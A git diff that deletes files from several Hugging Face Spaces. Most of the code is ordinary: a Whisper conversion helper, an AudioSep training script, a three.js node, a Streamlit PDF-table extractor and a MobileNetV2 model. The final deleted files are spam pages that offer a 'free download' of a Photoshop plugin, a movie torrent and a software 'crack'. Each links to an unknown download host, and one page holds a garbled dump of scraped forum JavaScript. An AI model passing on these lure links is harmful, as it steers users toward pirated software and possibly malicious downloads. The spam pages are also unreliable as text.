list(s_dict.keys()) - for key in keys: - new_key = key - for k, v in WHISPER_MAPPING.items(): - if k in key: - new_key = new_key.replace(k, v) - - print(f"{key} -> {new_key}") - - s_dict[new_key] = s_dict.pop(key) - return s_dict - - -def convert_hf_whisper(hf_model_name_or_path: str, whisper_state_path: str): - transformer_model = WhisperForConditionalGeneration.from_pretrained(hf_model_name_or_path) - config = transformer_model.config - - # first build dims - dims = { - 'n_mels': config.num_mel_bins, - 'n_vocab': config.vocab_size, - 'n_audio_ctx': 
config.max_source_positions, - 'n_audio_state': config.d_model, - 'n_audio_head': config.encoder_attention_heads, - 'n_audio_layer': config.encoder_layers, - 'n_text_ctx': config.max_target_positions, - 'n_text_state': config.d_model, - 'n_text_head': config.decoder_attention_heads, - 'n_text_layer': config.decoder_layers - } - - state_dict = deepcopy(transformer_model.model.state_dict()) - state_dict = rename_keys(state_dict) - - torch.save({"dims": dims, "model_state_dict": state_dict}, whisper_state_path) \ No newline at end of file diff --git a/spaces/badayvedat/AudioSep/train.py b/spaces/badayvedat/AudioSep/train.py deleted file mode 100644 index acde85b20c7e1abd4b5f8fc732470a80c8428d82..0000000000000000000000000000000000000000 --- a/spaces/badayvedat/AudioSep/train.py +++ /dev/null @@ -1,307 +0,0 @@ -import argparse -import logging -import os -import pathlib -from typing import List, NoReturn -import lightning.pytorch as pl -from lightning.pytorch.strategies import DDPStrategy -from torch.utils.tensorboard import SummaryWriter -from data.datamodules import * -from utils import create_logging, parse_yaml -from models.resunet import * -from losses import get_loss_function -from models.audiosep import AudioSep, get_model_class -from data.waveform_mixers import SegmentMixer -from models.clap_encoder import CLAP_Encoder -from callbacks.base import CheckpointEveryNSteps -from optimizers.lr_schedulers import get_lr_lambda - - -def get_dirs( - workspace: str, - filename: str, - config_yaml: str, - devices_num: int -) -> List[str]: - r"""Get directories and paths. - - Args: - workspace (str): directory of workspace - filename (str): filename of current .py file. - config_yaml (str): config yaml path - devices_num (int): 0 for cpu and 8 for training with 8 GPUs - - Returns: - checkpoints_dir (str): directory to save checkpoints - logs_dir (str), directory to save logs - tf_logs_dir (str), directory to save TensorBoard logs - statistics_path (str), directory to save statistics - """ - - os.makedirs(workspace, exist_ok=True) - - yaml_name = pathlib.Path(config_yaml).stem - - # Directory to save checkpoints - checkpoints_dir = os.path.join( - workspace, - "checkpoints", - filename, - "{},devices={}".format(yaml_name, devices_num), - ) - os.makedirs(checkpoints_dir, exist_ok=True) - - # Directory to save logs - logs_dir = os.path.join( - workspace, - "logs", - filename, - "{},devices={}".format(yaml_name, devices_num), - ) - os.makedirs(logs_dir, exist_ok=True) - - # Directory to save TensorBoard logs - create_logging(logs_dir, filemode="w") - logging.info(args) - - tf_logs_dir = os.path.join( - workspace, - "tf_logs", - filename, - "{},devices={}".format(yaml_name, devices_num), - ) - - # Directory to save statistics - statistics_path = os.path.join( - workspace, - "statistics", - filename, - "{},devices={}".format(yaml_name, devices_num), - "statistics.pkl", - ) - os.makedirs(os.path.dirname(statistics_path), exist_ok=True) - - return checkpoints_dir, logs_dir, tf_logs_dir, statistics_path - - -def get_data_module( - config_yaml: str, - num_workers: int, - batch_size: int, -) -> DataModule: - r"""Create data_module. 
Mini-batch data can be obtained by: - - code-block:: python - - data_module.setup() - - for batch_data_dict in data_module.train_dataloader(): - print(batch_data_dict.keys()) - break - - Args: - workspace: str - config_yaml: str - num_workers: int, e.g., 0 for non-parallel and 8 for using cpu cores - for preparing data in parallel - distributed: bool - - Returns: - data_module: DataModule - """ - - # read configurations - configs = parse_yaml(config_yaml) - sampling_rate = configs['data']['sampling_rate'] - segment_seconds = configs['data']['segment_seconds'] - - # audio-text datasets - datafiles = configs['data']['datafiles'] - - # dataset - dataset = AudioTextDataset( - datafiles=datafiles, - sampling_rate=sampling_rate, - max_clip_len=segment_seconds, - ) - - - # data module - data_module = DataModule( - train_dataset=dataset, - num_workers=num_workers, - batch_size=batch_size - ) - - return data_module - - -def train(args) -> NoReturn: - r"""Train, evaluate, and save checkpoints. - - Args: - workspace: str, directory of workspace - gpus: int, number of GPUs to train - config_yaml: str - """ - - # arguments & parameters - workspace = args.workspace - config_yaml = args.config_yaml - filename = args.filename - - devices_num = torch.cuda.device_count() - # Read config file. - configs = parse_yaml(config_yaml) - - # Configuration of data - max_mix_num = configs['data']['max_mix_num'] - sampling_rate = configs['data']['sampling_rate'] - lower_db = configs['data']['loudness_norm']['lower_db'] - higher_db = configs['data']['loudness_norm']['higher_db'] - - # Configuration of the separation model - query_net = configs['model']['query_net'] - model_type = configs['model']['model_type'] - input_channels = configs['model']['input_channels'] - output_channels = configs['model']['output_channels'] - condition_size = configs['model']['condition_size'] - use_text_ratio = configs['model']['use_text_ratio'] - - # Configuration of the trainer - num_nodes = configs['train']['num_nodes'] - batch_size = configs['train']['batch_size_per_device'] - sync_batchnorm = configs['train']['sync_batchnorm'] - num_workers = configs['train']['num_workers'] - loss_type = configs['train']['loss_type'] - optimizer_type = configs["train"]["optimizer"]["optimizer_type"] - learning_rate = float(configs['train']["optimizer"]['learning_rate']) - lr_lambda_type = configs['train']["optimizer"]['lr_lambda_type'] - warm_up_steps = configs['train']["optimizer"]['warm_up_steps'] - reduce_lr_steps = configs['train']["optimizer"]['reduce_lr_steps'] - save_step_frequency = configs['train']['save_step_frequency'] - resume_checkpoint_path = args.resume_checkpoint_path - if resume_checkpoint_path == "": - resume_checkpoint_path = None - else: - logging.info(f'Finetuning AudioSep with checkpoint [{resume_checkpoint_path}]') - - # Get directories and paths - checkpoints_dir, logs_dir, tf_logs_dir, statistics_path = get_dirs( - workspace, filename, config_yaml, devices_num, - ) - - logging.info(configs) - - # data module - data_module = get_data_module( - config_yaml=config_yaml, - batch_size=batch_size, - num_workers=num_workers, - ) - - # model - Model = get_model_class(model_type=model_type) - - ss_model = Model( - input_channels=input_channels, - output_channels=output_channels, - condition_size=condition_size, - ) - - # loss function - loss_function = get_loss_function(loss_type) - - segment_mixer = SegmentMixer( - max_mix_num=max_mix_num, - lower_db=lower_db, - higher_db=higher_db - ) - - - if query_net == 'CLAP': - query_encoder = 
CLAP_Encoder() - else: - raise NotImplementedError - - lr_lambda_func = get_lr_lambda( - lr_lambda_type=lr_lambda_type, - warm_up_steps=warm_up_steps, - reduce_lr_steps=reduce_lr_steps, - ) - - # pytorch-lightning model - pl_model = AudioSep( - ss_model=ss_model, - waveform_mixer=segment_mixer, - query_encoder=query_encoder, - loss_function=loss_function, - optimizer_type=optimizer_type, - learning_rate=learning_rate, - lr_lambda_func=lr_lambda_func, - use_text_ratio=use_text_ratio - ) - - checkpoint_every_n_steps = CheckpointEveryNSteps( - checkpoints_dir=checkpoints_dir, - save_step_frequency=save_step_frequency, - ) - - summary_writer = SummaryWriter(log_dir=tf_logs_dir) - - callbacks = [checkpoint_every_n_steps] - - trainer = pl.Trainer( - accelerator='auto', - devices='auto', - strategy='ddp_find_unused_parameters_true', - num_nodes=num_nodes, - precision="32-true", - logger=None, - callbacks=callbacks, - fast_dev_run=False, - max_epochs=-1, - log_every_n_steps=50, - use_distributed_sampler=True, - sync_batchnorm=sync_batchnorm, - num_sanity_val_steps=2, - enable_checkpointing=False, - enable_progress_bar=True, - enable_model_summary=True, - ) - - # Fit, evaluate, and save checkpoints. - trainer.fit( - model=pl_model, - train_dataloaders=None, - val_dataloaders=None, - datamodule=data_module, - ckpt_path=resume_checkpoint_path, - ) - - -if __name__ == "__main__": - - parser = argparse.ArgumentParser() - parser.add_argument( - "--workspace", type=str, required=True, help="Directory of workspace." - ) - parser.add_argument( - "--config_yaml", - type=str, - required=True, - help="Path of config file for training.", - ) - - parser.add_argument( - "--resume_checkpoint_path", - type=str, - required=True, - default='', - help="Path of pretrained checkpoint for finetuning.", - ) - - args = parser.parse_args() - args.filename = pathlib.Path(__file__).stem - - train(args) \ No newline at end of file diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/utils/UVTransformNode.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/utils/UVTransformNode.js deleted file mode 100644 index a19149ad0f059f58fd9023dd29e089974cf48fa5..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/utils/UVTransformNode.js +++ /dev/null @@ -1,66 +0,0 @@ -/** - * @author sunag / http://www.sunag.com.br/ - */ - -import { ExpressionNode } from '../core/ExpressionNode.js'; -import { Matrix3Node } from '../inputs/Matrix3Node.js'; -import { UVNode } from '../accessors/UVNode.js'; - -function UVTransformNode( uv, position ) { - - ExpressionNode.call( this, "( uvTransform * vec3( uvNode, 1 ) ).xy", "vec2" ); - - this.uv = uv || new UVNode(); - this.position = position || new Matrix3Node(); - -} - -UVTransformNode.prototype = Object.create( ExpressionNode.prototype ); -UVTransformNode.prototype.constructor = UVTransformNode; -UVTransformNode.prototype.nodeType = "UVTransform"; - -UVTransformNode.prototype.generate = function ( builder, output ) { - - this.keywords[ "uvNode" ] = this.uv; - this.keywords[ "uvTransform" ] = this.position; - - return ExpressionNode.prototype.generate.call( this, builder, output ); - -}; - -UVTransformNode.prototype.setUvTransform = function ( tx, ty, sx, sy, rotation, cx, cy ) { - - cx = cx !== undefined ? cx : .5; - cy = cy !== undefined ? 
cy : .5; - - this.position.value.setUvTransform( tx, ty, sx, sy, rotation, cx, cy ); - -}; - -UVTransformNode.prototype.copy = function ( source ) { - - ExpressionNode.prototype.copy.call( this, source ); - - this.uv = source.uv; - this.position = source.position; - -}; - -UVTransformNode.prototype.toJSON = function ( meta ) { - - var data = this.getJSONNode( meta ); - - if ( ! data ) { - - data = this.createJSONNode( meta ); - - data.uv = this.uv.toJSON( meta ).uuid; - data.position = this.position.toJSON( meta ).uuid; - - } - - return data; - -}; - -export { UVTransformNode }; diff --git a/spaces/beihai/PDF-Table-Extractor/.history/app_20220621102131.py b/spaces/beihai/PDF-Table-Extractor/.history/app_20220621102131.py deleted file mode 100644 index f1837c63e2a0686914592d7ea9ac8cf9a848fe81..0000000000000000000000000000000000000000 --- a/spaces/beihai/PDF-Table-Extractor/.history/app_20220621102131.py +++ /dev/null @@ -1,53 +0,0 @@ -#-*- coding : utf-8-*- -import base64 -from subprocess import STDOUT -import streamlit as st -import pandas as pd -import camelot as cam # extracting tables from PDFs - -st.title("PDF Table Extractor") - -input_pdf = st.file_uploader(label = "", type = 'pdf') - -background = st.selectbox("表格线条是否隐藏",(False,True)) -extractor_mode = st.selectbox("单页抽取 OR 全文抽取",("单页抽取","全文抽取")) - -if input_pdf is not None: - # byte object into a PDF file - with open("input.pdf", "wb") as f: - base64_pdf = base64.b64encode(input_pdf.read()).decode('utf-8') - f.write(base64.b64decode(base64_pdf)) - f.close() - if extractor_mode == "单页抽取": - page_number = st.text_input("请填写表格所在PDF页码,eg: 3", value = 1) - # read the pdf and parse it using stream - tables = cam.read_pdf("input.pdf", pages=page_number, process_background=background) - result = pd.ExcelWriter('result.xlsx', engine='xlsxwriter') - tables[0].to_excel(result,index=False) - # for i in range(0,len(tables)): - # table = tables[i].df - # sheetname = str(i) - # table.to_excel(result, sheetname,index=False) - - with open('result.xlsx','rb') as f: - st.download_button('提取完成,点击下载!', f,file_name='result.xlsx',mime="application/vnd.ms-excel") - if extractor_mode == "全文抽取": - tables_all= cam.read_pdf("input.pdf", pages="all", process_background=background) - result_all = pd.ExcelWriter('result_all.xlsx', engine='xlsxwriter') - for i in range(0,len(tables_all)): - table = tables_all[i].df - sheetname = str(i) - table.to_excel(result_all, sheetname,index=False) - with open('result_all.xlsx','rb') as f: - st.download_button('抽取完成,点击下载!', f,file_name='result_all.xlsx',mime="application/vnd.ms-excel") - - -row9_spacer1, row9_1, row9_spacer2, row9_2, row9_spacer3 = st.columns((.2, 2.3, .4, 4.4, .2)) -with row9_1: - if st.button('单页抽取'): - st.write('单页抽取') -with row9_2: - if st.button('全文抽取'): - st.write('全文抽取') - - diff --git a/spaces/bhasker412/IDD-YOLO-Tracking/trackers/strongsort/deep/models/mobilenetv2.py b/spaces/bhasker412/IDD-YOLO-Tracking/trackers/strongsort/deep/models/mobilenetv2.py deleted file mode 100644 index c451ef84e726ebc8d4c8e47253f335494eb801c9..0000000000000000000000000000000000000000 --- a/spaces/bhasker412/IDD-YOLO-Tracking/trackers/strongsort/deep/models/mobilenetv2.py +++ /dev/null @@ -1,274 +0,0 @@ -from __future__ import division, absolute_import -import torch.utils.model_zoo as model_zoo -from torch import nn -from torch.nn import functional as F - -__all__ = ['mobilenetv2_x1_0', 'mobilenetv2_x1_4'] - -model_urls = { - # 1.0: top-1 71.3 - 'mobilenetv2_x1_0': - 
'https://mega.nz/#!NKp2wAIA!1NH1pbNzY_M2hVk_hdsxNM1NUOWvvGPHhaNr-fASF6c', - # 1.4: top-1 73.9 - 'mobilenetv2_x1_4': - 'https://mega.nz/#!RGhgEIwS!xN2s2ZdyqI6vQ3EwgmRXLEW3khr9tpXg96G9SUJugGk', -} - - -class ConvBlock(nn.Module): - """Basic convolutional block. - - convolution (bias discarded) + batch normalization + relu6. - - Args: - in_c (int): number of input channels. - out_c (int): number of output channels. - k (int or tuple): kernel size. - s (int or tuple): stride. - p (int or tuple): padding. - g (int): number of blocked connections from input channels - to output channels (default: 1). - """ - - def __init__(self, in_c, out_c, k, s=1, p=0, g=1): - super(ConvBlock, self).__init__() - self.conv = nn.Conv2d( - in_c, out_c, k, stride=s, padding=p, bias=False, groups=g - ) - self.bn = nn.BatchNorm2d(out_c) - - def forward(self, x): - return F.relu6(self.bn(self.conv(x))) - - -class Bottleneck(nn.Module): - - def __init__(self, in_channels, out_channels, expansion_factor, stride=1): - super(Bottleneck, self).__init__() - mid_channels = in_channels * expansion_factor - self.use_residual = stride == 1 and in_channels == out_channels - self.conv1 = ConvBlock(in_channels, mid_channels, 1) - self.dwconv2 = ConvBlock( - mid_channels, mid_channels, 3, stride, 1, g=mid_channels - ) - self.conv3 = nn.Sequential( - nn.Conv2d(mid_channels, out_channels, 1, bias=False), - nn.BatchNorm2d(out_channels), - ) - - def forward(self, x): - m = self.conv1(x) - m = self.dwconv2(m) - m = self.conv3(m) - if self.use_residual: - return x + m - else: - return m - - -class MobileNetV2(nn.Module): - """MobileNetV2. - - Reference: - Sandler et al. MobileNetV2: Inverted Residuals and - Linear Bottlenecks. CVPR 2018. - - Public keys: - - ``mobilenetv2_x1_0``: MobileNetV2 x1.0. - - ``mobilenetv2_x1_4``: MobileNetV2 x1.4. - """ - - def __init__( - self, - num_classes, - width_mult=1, - loss='softmax', - fc_dims=None, - dropout_p=None, - **kwargs - ): - super(MobileNetV2, self).__init__() - self.loss = loss - self.in_channels = int(32 * width_mult) - self.feature_dim = int(1280 * width_mult) if width_mult > 1 else 1280 - - # construct layers - self.conv1 = ConvBlock(3, self.in_channels, 3, s=2, p=1) - self.conv2 = self._make_layer( - Bottleneck, 1, int(16 * width_mult), 1, 1 - ) - self.conv3 = self._make_layer( - Bottleneck, 6, int(24 * width_mult), 2, 2 - ) - self.conv4 = self._make_layer( - Bottleneck, 6, int(32 * width_mult), 3, 2 - ) - self.conv5 = self._make_layer( - Bottleneck, 6, int(64 * width_mult), 4, 2 - ) - self.conv6 = self._make_layer( - Bottleneck, 6, int(96 * width_mult), 3, 1 - ) - self.conv7 = self._make_layer( - Bottleneck, 6, int(160 * width_mult), 3, 2 - ) - self.conv8 = self._make_layer( - Bottleneck, 6, int(320 * width_mult), 1, 1 - ) - self.conv9 = ConvBlock(self.in_channels, self.feature_dim, 1) - - self.global_avgpool = nn.AdaptiveAvgPool2d(1) - self.fc = self._construct_fc_layer( - fc_dims, self.feature_dim, dropout_p - ) - self.classifier = nn.Linear(self.feature_dim, num_classes) - - self._init_params() - - def _make_layer(self, block, t, c, n, s): - # t: expansion factor - # c: output channels - # n: number of blocks - # s: stride for first layer - layers = [] - layers.append(block(self.in_channels, c, t, s)) - self.in_channels = c - for i in range(1, n): - layers.append(block(self.in_channels, c, t)) - return nn.Sequential(*layers) - - def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None): - """Constructs fully connected layer. 
- - Args: - fc_dims (list or tuple): dimensions of fc layers, if None, no fc layers are constructed - input_dim (int): input dimension - dropout_p (float): dropout probability, if None, dropout is unused - """ - if fc_dims is None: - self.feature_dim = input_dim - return None - - assert isinstance( - fc_dims, (list, tuple) - ), 'fc_dims must be either list or tuple, but got {}'.format( - type(fc_dims) - ) - - layers = [] - for dim in fc_dims: - layers.append(nn.Linear(input_dim, dim)) - layers.append(nn.BatchNorm1d(dim)) - layers.append(nn.ReLU(inplace=True)) - if dropout_p is not None: - layers.append(nn.Dropout(p=dropout_p)) - input_dim = dim - - self.feature_dim = fc_dims[-1] - - return nn.Sequential(*layers) - - def _init_params(self): - for m in self.modules(): - if isinstance(m, nn.Conv2d): - nn.init.kaiming_normal_( - m.weight, mode='fan_out', nonlinearity='relu' - ) - if m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.BatchNorm2d): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.BatchNorm1d): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.Linear): - nn.init.normal_(m.weight, 0, 0.01) - if m.bias is not None: - nn.init.constant_(m.bias, 0) - - def featuremaps(self, x): - x = self.conv1(x) - x = self.conv2(x) - x = self.conv3(x) - x = self.conv4(x) - x = self.conv5(x) - x = self.conv6(x) - x = self.conv7(x) - x = self.conv8(x) - x = self.conv9(x) - return x - - def forward(self, x): - f = self.featuremaps(x) - v = self.global_avgpool(f) - v = v.view(v.size(0), -1) - - if self.fc is not None: - v = self.fc(v) - - if not self.training: - return v - - y = self.classifier(v) - - if self.loss == 'softmax': - return y - elif self.loss == 'triplet': - return y, v - else: - raise KeyError("Unsupported loss: {}".format(self.loss)) - - -def init_pretrained_weights(model, model_url): - """Initializes model with pretrained weights. - - Layers that don't match with pretrained layers in name or size are kept unchanged. 
- """ - pretrain_dict = model_zoo.load_url(model_url) - model_dict = model.state_dict() - pretrain_dict = { - k: v - for k, v in pretrain_dict.items() - if k in model_dict and model_dict[k].size() == v.size() - } - model_dict.update(pretrain_dict) - model.load_state_dict(model_dict) - - -def mobilenetv2_x1_0(num_classes, loss, pretrained=True, **kwargs): - model = MobileNetV2( - num_classes, - loss=loss, - width_mult=1, - fc_dims=None, - dropout_p=None, - **kwargs - ) - if pretrained: - # init_pretrained_weights(model, model_urls['mobilenetv2_x1_0']) - import warnings - warnings.warn( - 'The imagenet pretrained weights need to be manually downloaded from {}' - .format(model_urls['mobilenetv2_x1_0']) - ) - return model - - -def mobilenetv2_x1_4(num_classes, loss, pretrained=True, **kwargs): - model = MobileNetV2( - num_classes, - loss=loss, - width_mult=1.4, - fc_dims=None, - dropout_p=None, - **kwargs - ) - if pretrained: - # init_pretrained_weights(model, model_urls['mobilenetv2_x1_4']) - import warnings - warnings.warn( - 'The imagenet pretrained weights need to be manually downloaded from {}' - .format(model_urls['mobilenetv2_x1_4']) - ) - return model diff --git a/spaces/bioriAsaeru/text-to-voice/Adobe Photoshop Cs5 Camera Raw Plugin A Must-Have for Mac Users.md b/spaces/bioriAsaeru/text-to-voice/Adobe Photoshop Cs5 Camera Raw Plugin A Must-Have for Mac Users.md deleted file mode 100644 index 60e24d714e45cb1ebada1e72f256844d670f29c2..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Adobe Photoshop Cs5 Camera Raw Plugin A Must-Have for Mac Users.md +++ /dev/null @@ -1,6 +0,0 @@ -
      -

I have purchased a new camera, a Nikon D750, and now Photoshop CS5.1 with the Camera Raw plug-in version 6.7 doesn't support the files from it. Which version of the Camera Raw plug-in can I install to solve this problem?

That camera requires Camera Raw 8.7 or later (or Lightroom 5.7), while the last version of Camera Raw supported in CS5 is 6.7. You will either need to update to CS6 or newer in order to run a more recent version of the ACR plug-in, or use the free Adobe DNG Converter utility to convert your files to DNG before importing them; a scripted example of the DNG route follows below.
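If you shoot a lot of raw files, the DNG Converter step can be scripted instead of run by hand. The snippet below is only a minimal sketch, not an official workflow: the install path shown is the usual macOS location, and the -c/-d switches are taken from the DNG Converter's command-line documentation, so check both against your own installation before relying on it.

```python
import subprocess
from pathlib import Path

# Assumed install location of the free Adobe DNG Converter on macOS; on Windows it
# usually lives under C:\Program Files\Adobe\Adobe DNG Converter\. Adjust as needed.
DNG_CONVERTER = "/Applications/Adobe DNG Converter.app/Contents/MacOS/Adobe DNG Converter"

def convert_nef_to_dng(source_dir: str, output_dir: str) -> None:
    """Convert every Nikon .NEF file in source_dir to DNG for use with Camera Raw 6.7 (CS5)."""
    src = Path(source_dir).expanduser()
    out = Path(output_dir).expanduser()
    out.mkdir(parents=True, exist_ok=True)
    nef_files = sorted(p for p in src.iterdir() if p.suffix.lower() == ".nef")
    if not nef_files:
        print(f"No NEF files found in {src}")
        return
    # -c writes lossless-compressed DNGs and -d sets the output directory; both switches
    # come from the DNG Converter command-line documentation -- verify on your version.
    cmd = [DNG_CONVERTER, "-c", "-d", str(out)] + [str(f) for f in nef_files]
    subprocess.run(cmd, check=True)
    print(f"Converted {len(nef_files)} file(s) into {out}")

convert_nef_to_dng("~/Pictures/D750", "~/Pictures/D750_DNG")
```

If the converted DNG files still won't open, the converter's preferences also expose a Camera Raw compatibility setting that can be lowered for older hosts such as CS5.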

      -

      Adobe Photoshop Cs5 Camera Raw Plugin Free Download Mac


      Download · https://urloso.com/2uyQh0



      -

captureSnapshot('event'); dnmsCCLinkClick(getDigitalDataProperty(COMMUNITY_CATEGORY), ccurl, CC_LINKS_TYPE[ccType], 'Conversation'); ); function trackFollowUnfollowClick(tElement, action) let isFollowAction = action==='follow'; if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(isFollowAction?CONVERSATION_FOLLOW:CONVERSATION_UNFOLLOW, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick(action, getConversationPageDetails()); else setPrimaryEvent(isFollowAction?REPLY_FOLLOW:REPLY_UNFOLLOW, REPLY_ACTION); let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick(action, replyType, getConversationPageDetails()); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackBanUserClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_BAN_USER, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('ban user', getConversationPageDetails()); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('ban user', replyType, getConversationPageDetails()); setPrimaryEvent(REPLY_BAN_USER, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackMarkSpamClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_SPAM, CONVERSATION_ACTION); //dunamis api call let convArray = getConversationPageDetails(); dnmsConversationActionsClick('mark as spam', convArray); if(convArray.length > 1) syncDataOnS3('Spam', convArray[1]); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('mark as spam', replyType, getConversationPageDetails()); setPrimaryEvent(REPLY_SPAM, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackDeleteMessageClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_DELETE, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('delete the conversation', getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:originalPost'+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('delete the reply', replyType, getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:'+replyType+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); setPrimaryEvent(REPLY_DELETE, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackMoveMergeClick(tElement) localStorage.setItem("movingConversationId", getDigitalDataProperty(COMMUNITY_ID)); if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_MOVE_MERGE, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('move/merge the conversation', getConversationPageDetails()); localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:originalPost'+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('move/merge the conversation', replyType, getConversationPageDetails()); 
localStorage.setItem('moveMergeDeletetriggeredBy','conversationPage:'+replyType+':'+getConversationPageDetails().toString()+':'+getDigitalDataProperty(COMMUNITY_CONTENT_TYPE)); setPrimaryEvent(REPLY_MOVE_MERGE, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackViewHistoryClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_VIEW_HISTORY, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('view history', getConversationPageDetails()); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('view history', replyType, getConversationPageDetails()); setPrimaryEvent(REPLY_VIEW_HISTORY, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackEditMessageClick(tElement) if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_EDIT, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('edit message', getConversationPageDetails()); localStorage.setItem('gpEditMessagePageNum', getCommunityCurrentPageNum()); else let replyType = getReplyType(tElement); if(replyType) localStorage.setItem('gpEditMessagePageNum', getCommunityCurrentPageNum()); dnmsConversationReplyActionsClick('edit message', replyType, getConversationPageDetails()); localStorage.setItem('gpEditMessageType', replyType); setPrimaryEvent(REPLY_EDIT, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackReportClick(tElement) let tempConversationPageDetails = getConversationPageDetails(); tempConversationPageDetails[2] = encodeURIComponent(tempConversationPageDetails[2]); localStorage.setItem('gpReportMessageDetails', tempConversationPageDetails); if(tElement.closest('.lia-thread-topic').length > 0) setPrimaryEvent(CONVERSATION_REPORT, CONVERSATION_ACTION); //dunamis api call dnmsConversationActionsClick('report', getConversationPageDetails()); else let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick('report', replyType, getConversationPageDetails()); localStorage.setItem('gpReportMessageType', replyType); setPrimaryEvent(REPLY_REPORT, REPLY_ACTION); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); captureSnapshot('event');function trackMarkUnmarkCorrectAnswer(action, tElement) let correctFlag = action==='mark correct answer'; setPrimaryEvent(correctFlag?MARKED_CORRECT:UNMARKED_CORRECT, correctFlag?REPLY_MARKED_CORRECT:REPLY_UNMARKED_CORRECT); cleanDigitalDataProperties([COMMUNITY_ATTRIBUTES]); convDetails = getConversationPageDetails(); if(correctFlag) convDetails = setSophiaPayload(convDetails); captureSnapshot('event'); let replyType = getReplyType(tElement); if(replyType) dnmsConversationReplyActionsClick(action, replyType, convDetails); cleanDigitalDataProperties([SOPHIA_EVENTS]);function detectRelatedConversationsLoad() { if($('.personalised-related-conversations').length > 0) let targetNode = $('.personalised-related-conversations')[0]; let config = childList: true ; let callback = function(mutationsList, observer) for(let i=0; i 0) status = $('.message-status-link')[0].innerText; dnmsConversationStatusUpdate('success',getConversationPageDetails(), comment, status); setPrimaryEvent('Community: StatusChanged'+status.replace(' ',''),'conversationStatusUpdated'); setDigitalDataProperty(PRIMARY_FILTER, createGPFilterInfoObj(status, 'statusChange')); captureSnapshot('event'); 
localStorage.removeItem('messageStatusUpdate'); cleanDigitalDataProperties([PRIMARY_FILTER, FILTERS]); catch(e) console.log(e); function isReplyBodyEmpty() { let result = false; let xNode;if($('.mce-edit-area').length > 0 && $('.mce-edit-area').children().length > 0) { let mceEditAreaiFrames = $('.mce-edit-area').children(); for(let i=0; i 0 && (content[0].hasAttribute('data-mce-bogus') || tinymce.innerHTML === '

      aaccfb2cb3
      -
      -
      \ No newline at end of file diff --git a/spaces/bioriAsaeru/text-to-voice/Dharam Sankat Mein Download Torrent A Bollywood Movie That Will Make You Laugh and Think.md b/spaces/bioriAsaeru/text-to-voice/Dharam Sankat Mein Download Torrent A Bollywood Movie That Will Make You Laugh and Think.md deleted file mode 100644 index 9abd8859bc49614f0a08109fdb62dd681da67820..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Dharam Sankat Mein Download Torrent A Bollywood Movie That Will Make You Laugh and Think.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Dharam Sankat Mein Download Torrent


      DOWNLOAD >>> https://urloso.com/2uyPpb



      - - aaccfb2cb3
      -
      -
      -

      diff --git a/spaces/bioriAsaeru/text-to-voice/Gt-suite 7.3 Crack High Quality.md b/spaces/bioriAsaeru/text-to-voice/Gt-suite 7.3 Crack High Quality.md deleted file mode 100644 index db7859ae24b7d7c708e04803891414312463d414..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Gt-suite 7.3 Crack High Quality.md +++ /dev/null @@ -1,36 +0,0 @@ - -

      GT-SUITE 7.3: A Powerful Simulation Tool for Engine and Vehicle Systems

      -

